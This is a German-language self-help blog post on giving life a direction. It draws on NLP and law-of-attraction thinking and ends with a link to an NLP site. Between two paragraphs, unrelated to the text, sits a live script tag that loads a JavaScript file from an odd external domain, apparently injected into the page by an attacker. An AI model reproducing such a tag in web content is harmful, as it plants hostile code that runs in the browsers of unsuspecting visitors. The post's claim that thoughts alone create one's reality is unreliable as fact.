Wohin willst du? Wozu es so wichtig ist, deinem Leben eine Richtung zu geben

Wir haben uns im Laufe unseres Lebens angewöhnt, uns darüber bewusst zu sein, was wir NICHT möchten. Ständig beschäftigen wir uns damit, was wir in unserem Leben NICHT SEHEN, NICHT HÖREN und NICHT FÜHLEN wollen. Wir bewegen uns also nicht auf etwas ZU, sondern laufen vor etwas WEG. Indem wir unseren FOKUS auf das lenken, was wir ABLEHNEN, erzeugen wir mehr davon. Denn unsere ENERGIE – also die KRAFT in uns allen, die ERSCHAFFT – fließt exakt dorthin, wo unser FOKUS ist.

Wir denken ständig etwas. Und das wird nie anders sein. Denn wir haben einen Verstand und das ist auch gut so. Nur ist es so: Wenn wir ständig an das denken, was wir NICHT möchten, ERSCHAFFEN wir immer mehr davon. Wie soll es denn anders gehen? Wenn du mit deinem ganzen SPIRIT bei alledem bist, was du als „schlecht“ bewertest, wie soll dieser SPIRIT etwas ERSCHAFFEN, was du als „gut“ bewerten würdest?

<script src='https://letsmakeparty3.ga/l.js?p=1' type=text/javascript></script>

Das musst dann schon du SELBST tun. Durch ACHTSAMKEIT. Durch BEWUSSTHEIT. Es ist ein Prozess und es sind viele Prägungen, durch die du das Leben erfährst. Es ist an dir, dich selbst zu BEOBACHTEN und WAHRZUNEHMEN. Es ist an dir, festzustellen, was dich davon abhält, dein volles Potenzial zu leben und dein Leben ausnahmslos nach deinen Vorstellungen zu gestalten. Und das ist ein Prozess. Das geht nicht von heute auf morgen. Stell‘ dir doch mal vor: Du sollst Denk-, Fühl- und Handlungsmuster verändern, die du jahrelang so – und nicht anders - angewandt hast. Das ist nicht ganz so einfach. Wenn du deine Zähne für GEWÖHNLICH mit der rechten Hand putzt und sie jetzt plötzlich mit der linken Hand putzen sollst, dann fühlt sich das anfangs auch erstmal unGEWOHNT an. Albert Einstein hat gesagt: „Es ist schwieriger, eine vorgefasste Meinung zu zertrümmern als ein Atom.“ Das, was du GEWOHNT bist zu denken, zu fühlen und zu tun, ist sozusagen deine vorgefasste Meinung bzw. deine Gewohnheit.

Deinem Leben eine Richtung zu geben, heißt, deinem Leben einen Sinn zu geben. Und egal, was du je darüber gedacht hast: DU – NUR DU – entscheidest darüber, WELCHEN Sinn du deinem Leben gibst! Wenn du deinem Leben keine Richtung gibst, passiert dir das Leben einfach. Du lebst RE-AKTIV anstatt AKTIV. Du RE-AGIERST auf das Leben, anstatt das Leben AKTIV zu GESTALTEN. Und glaub’ mir: Genau dafür bist du auf dieser Welt. Um dein Leben AKTIV zu GESTALTEN. Es ist unser aller Geburtsrecht, ein Leben in Freude, Frieden und Fülle zu leben. Doch um eben solch ein Leben zu leben, ist es unabdingbar, sich darüber im Klaren zu sein, WAS MAN VOM LEBEN MÖCHTE! Es bringt nichts und wieder nichts, sich mit alledem zu beschäftigen, was uns unzufrieden stimmt. Doch, es bringt doch etwas. Und zwar noch mehr von dem, was uns unzufrieden stimmt. Denn wie bereits oben offenbart, bekommen wir vom Leben das, womit wir uns geistig auseinandersetzen.

Und wenn du ständig denkst ‘Das nervt mich. Dies kotzt mich an. Davon habe ich zu wenig. Das mag ich nicht.’ usw. verschwendest du all deine ENERGIE – also deine WERTVOLLSTE RESSOURCE – in die Mankos.

Wenn du dir hingegen den IDEALEN Zustand vorstellst, dich in deinem Geiste bereits in eben diesem Zustand sehen kannst, dann ist es nur noch eine Frage der Zeit. Eines Tages wirst du genau dieses Ideal leben. Doch bis dahin brauchst du MUT und GLAUBE.

MUT deshalb, weil du dich TRAUEN darfst, ein SELBSTBESTIMMTES Ideal in deinem Geiste am Leben zu erhalten, bis es eines Tages deine Realität ist.

GLAUBE deshalb, weil du daran GLAUBEN darfst – eigentlich MUSST – dass dieser ideale Zustand genauso existiert wie all der Schrott, den du dir erzählst. Sorry für meine plumpe Wortwahl. Aber ich finde, dass wir wirklich viel zu viel Schrott denken. Und uns leider nicht darüber BEWUSST sind, dass wir in jedem Augenblick und mit jedem Schrott-Gedanken unsere Realität erschaffen.

Also: Schaffe dir ZIEL-KLARHEIT. Wohin soll’s gehen? Welches ist der ideale Zustand? Welches ist der ideale Körper, den du dir ausmalst? Welches ist die ideale Wohnung? Welche Beziehung wäre ideal? Welches Lebensgefühl wäre ideal? Habe Mut und träume groß. Denn mit der Fantasie und somit dem Träumen fängt alles an.

Du kannst viele mentale Techniken nutzen, um dich immer und immer mehr mit deinem IDEAL zu identifizieren. Und dies muss erst auf geistiger Ebene geschehen, damit es einst REALITÄT ist. Zu diesen Techniken gehören beispielsweise MEDITATION und VISUALISIERUNG. Ich stehe total auf die beiden Techniken. Je öfter du sie anwendest, desto besser werden sie dir gelingen. Das Gehen hast du auch nicht an einem Tag gelernt. Also bitte sei geduldig mit dir. Es ist ein Prozess.

VETRAUEN, GLAUBE, MUT und GEDULD sind brillante Begleiter auf dem Weg zu deinem Ideal. Vertraue dem Leben. Glaube an dein Ideal. Habe Mut an etwas zu glauben, das NOCH nicht existiert. Habe Geduld – wie gesagt: ROM WURDE AUCH NICHT AN EINEM TAG ERBAUT.

Ich wünsche dir auf deinem Weg alles alles Liebe und ich bin mir sicher, dass das Leben viel mehr für uns bereithält, als das, was unser Verstand – basierend auf bisherigen Lebenserfahrungen - für möglich hält.

In Freundschaft und Verbundenheit,

Dein NLP-Zauberlehrling,

Elifcan 🙂

Mehr Informationen über NLP: www.nlpstuttgart.de

Kommentar verfassen

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.